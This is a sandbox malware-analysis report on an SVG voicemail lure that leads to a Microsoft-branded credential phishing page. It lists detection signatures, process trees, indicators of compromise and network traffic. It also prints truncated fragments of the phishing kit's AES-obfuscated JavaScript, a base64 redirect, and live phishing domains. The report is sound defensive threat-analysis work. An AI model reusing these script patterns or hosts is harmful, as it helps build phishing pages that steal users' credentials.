Windows Analysis Report
#U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg

Overview

General Information

Sample name: #U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg (renamed because original name is a hash value)
Original sample name: Voicemailjsisler@sweepingcorp.com.svg
Analysis ID: 1636750
MD5: a791e19357f1015af1b8816e5b743087
SHA1: e455a0b82d5f1ddaea8f3246a1efb55d7adb0b97
SHA256: 28bb935c95745afb3390b709c03f9840fc09a7e5e56e4b7e1d9036e0e0b1f095
Detection

Gabagool
Score: 80
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected Gabagool
AI detected suspicious Javascript
HTML page contains hidden URLs
HTML page contains suspicious javascript code
Yara detected JavaScript embedded in SVG
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Javascript checks online IP of machine
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 7948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,7418917361889980763,10513141320866540213,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2196 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 8564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
#U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg | JoeSecurity_JavaScriptembeddedinSVG | Yara detected JavaScript embedded in SVG | Joe Security |

Source | Rule | Description | Author | Strings
1.8.pages.csv | JoeSecurity_Gabagool | Yara detected Gabagool | Joe Security |
1.6.pages.csv | JoeSecurity_Gabagool | Yara detected Gabagool | Joe Security |
1.7.pages.csv | JoeSecurity_Gabagool | Yara detected Gabagool | Joe Security |

No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: https://kindianstreetfood.com/rrr/ | Avira URL Cloud: Label: phishing
Source: https://kindianstreetfood.com/favicon.ico | Avira URL Cloud: Label: phishing

Phishing

Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29t | Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'kindianstreetfood.com' does not match the legitimate domain for Microsoft., The domain 'kindianstreetfood.com' appears unrelated to Microsoft and suggests a different business focus, likely a restaurant or food service., There are no indicators in the URL that suggest a legitimate association with Microsoft., The presence of a Microsoft brand name with an unrelated domain is a common phishing tactic. DOM: 1.6.pages.csv
Source: Yara match | File source: 1.8.pages.csv, type: HTML
Source: Yara match | File source: 1.6.pages.csv, type: HTML
Source: Yara match | File source: 1.7.pages.csv, type: HTML
Source: 0.0..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/%23U25b6%23Ufe0fVoi... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be attempting to redirect the user to a suspicious domain and potentially collect sensitive information, which is a clear indication of malicious intent.
Source: 1.18.d.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It appears to be a malicious script attempting to collect sensitive information and potentially execute further malicious actions.
Source: 1.51..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://kindianstreetfood.com/rrr/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script decrypts and executes remote content, which could potentially lead to the execution of malicious code. Additionally, it sends sensitive data (such as the 'usuuid' parameter) to an external server. The use of obfuscated strings and URLs further increases the risk. While the script may have a legitimate purpose, the overall risk level is high due to the presence of these concerning behaviors.
Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29t | HTTP Parser: https://wicked.bigpoliceman.com
Source: https://kindianstreetfood.com/rrr/ | HTTP Parser: window.location.href = atob(
Source: Yara match | File source: #U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg, type: SAMPLE
Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29t | HTTP Parser: Number of links: 0
Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29t | HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29t | HTTP Parser: Total embedded image size: 45708
Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29t | HTTP Parser: Base64 decoded: https://wicked.bigpoliceman.com
Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29t | HTTP Parser: Title: Account sign in does not match URL
Source: https://kindianstreetfood.com/rrr/ | HTTP Parser: let current_ip = null;function naksl6zj(plaintext, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } // generate a random iv (initialization vector) const iv = cryptojs.lib.wordarray.random(16); // encrypt the plain text using aes with the given key and random iv const encrypted = cryptojs.aes.encrypt(cryptojs.enc.utf8.parse(plaintext), cryptojs.enc.utf8.parse(key), { iv: iv, mode: cryptojs.mode.cbc, padding: cryptojs.pad.pkcs7 }); // combine the iv and ciphertext (iv is necessary for decryption) const encrypteddata = iv.concat(encrypted.ciphertext); // convert the combined data to base64 for easy transmission or storage return cryptojs.enc.base64.stringify(encrypteddata);}let psk = "2zvvsbn8pu7civuj5p8u7nm0t1qsf+l6pxhsiudzsacqthftqks7iov/i3gllmem5sclbvfoq8atpvp+mwxaha==";async function ojyub() { try { const response = await fetch("http...
Source: https://kindianstreetfood.com/rrr/ | HTTP Parser: let usuuid = "2zvvsbn8pu7civuj5p8u7nm0t1qsf+l6pxhsiudzsacqthftqks7iov/i3gllmem5sclbvfoq8atpvp+mwxaha=="; let policy = "gl/ifhtzhkkwp1+z39rgvzoa8vdl2whfusaf8idxovolww/zapelg9zfuiruw0dp"; let sv = "0"; let sir = "1"; function decstr(encryptedstring, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } const encrypteddata = cryptojs.enc.base64.parse(encryptedstring); const iv = cryptojs.lib.wordarray.create(encrypteddata.words.slice(0, 4)); const ciphertext = cryptojs.lib.wordarray.create( encrypteddata.words.slice(4) ); const decrypteddata = cryptojs.aes.decrypt( { ciphertext: ciphertext, }, cryptojs.enc.utf8.parse(key), { iv: iv, ...
Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29t | HTTP Parser: <input type="password" .../> found
Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29t | HTTP Parser: No favicon (7 occurrences)
Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29t | HTTP Parser: No <meta name="author".. found (3 occurrences)
Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29t | HTTP Parser: No <meta name="copyright".. found (3 occurrences)
Source: global traffic | TCP traffic: 192.168.2.4:55490 -> 1.1.1.1:53
Source: Joe Sandbox View | IP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox View | IP Address: 95.101.182.65 95.101.182.65
Source: Joe Sandbox View | IP Address: 104.26.12.205 104.26.12.205 (2 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 (5 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27 (5 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.186.99 (5 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.186.99 (2 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (23 occurrences)
Source: global traffic | HTTP traffic detected: GET /rrr/ HTTP/1.1Host: kindianstreetfood.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://kindianstreetfood.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://kindianstreetfood.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/a66ll/0x4AAAAAABAFlOnWuZQ7ePKv/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://kindianstreetfood.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91f82733ee52f859&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/a66ll/0x4AAAAAABAFlOnWuZQ7ePKv/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/a66ll/0x4AAAAAABAFlOnWuZQ7ePKv/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: kindianstreetfood.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kindianstreetfood.com/rrr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=391f5a2ae398f12590981887d72b506c; cookie_test=test; js_enabled=true
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/570593096:1741829356:PhCNM-6kz2lV6HRsRphjeo5kJCAu4Jn7jqK5hS8mDrM/91f82733ee52f859/WuS3.S6KIdJNgvhLTtH_j5wb5BxqBoQSXQOpo1Jmmg4-1741833485-1.1.1.1-MBoboxuaZC0tZLADIr9lLS9QYxeY1VmhddzFO3C7Npp84kewh0EodxNh4Cj0JRC5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91f82733ee52f859/1741833492490/LL_10geG9GnlWBe HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/a66ll/0x4AAAAAABAFlOnWuZQ7ePKv/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/91f82733ee52f859/1741833492491/37b45b0d0c9fe727c78cf8d28723f69ac7146a41a2e1508f4b311d4f9959da0d/hg3ym5R4LMLAb6D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/a66ll/0x4AAAAAABAFlOnWuZQ7ePKv/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91f82733ee52f859/1741833492490/LL_10geG9GnlWBe HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/570593096:1741829356:PhCNM-6kz2lV6HRsRphjeo5kJCAu4Jn7jqK5hS8mDrM/91f82733ee52f859/WuS3.S6KIdJNgvhLTtH_j5wb5BxqBoQSXQOpo1Jmmg4-1741833485-1.1.1.1-MBoboxuaZC0tZLADIr9lLS9QYxeY1VmhddzFO3C7Npp84kewh0EodxNh4Cj0JRC5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 (2 occurrences)
Source: global traffic | HTTP traffic detected: GET /rrr/ HTTP/1.1Host: kindianstreetfood.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://kindianstreetfood.com/rrr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=391f5a2ae398f12590981887d72b506c; cookie_test=test; js_enabled=true
Source: global traffic | HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://kindianstreetfood.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://kindianstreetfood.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://kindianstreetfood.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic | HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: kindianstreetfood.com
Source: global traffic | DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: wicked.bigpoliceman.com
Source: global traffic | DNS traffic detected: DNS query: code.jquery.com
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: aadcdn.msauthimages.net
Source: unknown | HTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/570593096:1741829356:PhCNM-6kz2lV6HRsRphjeo5kJCAu4Jn7jqK5hS8mDrM/91f82733ee52f859/WuS3.S6KIdJNgvhLTtH_j5wb5BxqBoQSXQOpo1Jmmg4-1741833485-1.1.1.1-MBoboxuaZC0tZLADIr9lLS9QYxeY1VmhddzFO3C7Npp84kewh0EodxNh4Cj0JRC5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3385sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: WuS3.S6KIdJNgvhLTtH_j5wb5BxqBoQSXQOpo1Jmmg4-1741833485-1.1.1.1-MBoboxuaZC0tZLADIr9lLS9QYxeY1VmhddzFO3C7Npp84kewh0EodxNh4Cj0JRC5cf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/a66ll/0x4AAAAAABAFlOnWuZQ7ePKv/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 02:38:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknown | Network traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55494
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55493
          Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49680 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
